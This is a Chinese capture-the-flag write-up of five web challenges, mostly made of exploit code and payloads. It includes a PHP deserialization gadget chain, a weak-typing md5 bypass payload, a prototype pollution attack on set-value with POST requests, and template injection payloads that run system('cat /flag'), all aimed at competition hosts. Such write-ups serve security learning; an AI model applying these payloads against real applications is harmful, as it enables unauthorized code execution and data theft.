划水的国赛Web

babyunserialize

www.zip源码泄露

参考 http://blog.ccreater.top/ wmctf 2020 webweb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
namespace DB{
abstract class Cursor implements \IteratorAggregate {}
}
namespace DB\SQL{
class Mapper extends \DB\Cursor{
protected
$props=["quotekey"=>"call_user_func"],
$adhoc=["phpinfo"=>["expr"=>""]],
$db;
function offsetExists($offset){}
function offsetGet($offset){}
function offsetSet($offset, $value){}
function offsetUnset($offset){}
function getIterator(){}
function __construct($val){
$this->db = $val;
}
}
}
namespace CLI{
class Agent {
protected
$server="";
public $events;
public function __construct(){
$this->events=["disconnect"=>array(new \DB\SQL\Mapper(new \DB\SQL\Mapper("")),"find")];
$this->server=&$this;
}
};
class WS{}
}
namespace {
echo urlencode(serialize(array(new \CLI\WS(),new \CLI\Agent())));
}

easyphp

迭代使用call_user_func调用pcntl函数致使异常

1
http://eci-2zed3ztpomt9kf7xbbng.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_wait

easytrick

源码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
class trick{
public $trick1;
public $trick2;
public function __destruct(){
$this->trick1 = (string)$this->trick1;
if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){
die("你太长了");
}
if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){
echo file_get_contents("/flag");
}
}
}
highlight_file(__FILE__);
unserialize($_GET['trick']);

弱类型判断绕过

1
O:5:"trick":2:{s:6:"trick1";i:1;s:6:"trick2";d:0.9999999999999999;}

littlegame

查看packge.json,发现set-value存在原型链污染 https://www.anquanke.com/vul/id/1715582

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
{
"name": "littlegame",
"version": "1.0.0",
"private": true,
"scripts": {
"start": "node ./bin/www"
},
"dependencies": {
"cookie-parser": "~1.4.4",
"debug": "~2.6.9",
"express": "~4.16.1",
"express-session": "^1.17.1",
"morgan": "~1.9.1",
"set-value": "^3.0.0"
}
}

在index.js找到flag接口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
const Admin = {
"password1":process.env.p1,
"password2":process.env.p2,
"password3":process.env.p3
}
...
router.post("/DeveloperControlPanel", function (req, res, next) {
// not implement
if (req.body.key === undefined || req.body.password === undefined){
res.send("What's your problem?");
}else {
let key = req.body.key.toString();
let password = req.body.password.toString();
if(Admin[key] === password){
res.send(process.env.flag);
}else {
res.send("Wrong password!Are you Admin?");
}
}
});
...
router.post("/Privilege", function (req, res, next) {
// Why not ask witch for help?
if(req.session.knight === undefined){
res.redirect('/SpawnPoint');
}else{
if (req.body.NewAttributeKey === undefined || req.body.NewAttributeValue === undefined) {
res.send("What's your problem?");
}else {
let key = req.body.NewAttributeKey.toString();
let value = req.body.NewAttributeValue.toString();
setFn(req.session.knight, key, value);
res.send("Let's have a check!");
}
}
});

构造如下exp:

1
2
3
4
5
http://eci-2ze2t1c804gx9bfude7s.cloudeci1.ichunqiu.com:8888/Privilege
POST NewAttributeKey=__proto__.password4&NewAttributeValue=tyao

http://eci-2ze2t1c804gx9bfude7s.cloudeci1.ichunqiu.com:8888/DeveloperControlPanel
POST key=password4&password=tyao

rceme

参考https://blog.csdn.net/qq_45708109/article/details/107645816

可以绕过的函数有很多,这里使用hex2bin

1
2
3
4
// phpinfo
?a={if:var_dump((hex2bin(%27706870696e666f%27))())}Tyao{end%20if}
// cat /flag
?a={if:var_dump(((hex2bin(%2773797374656d%27))(%27cat%20/flag%27)))}Tyao{end%20if}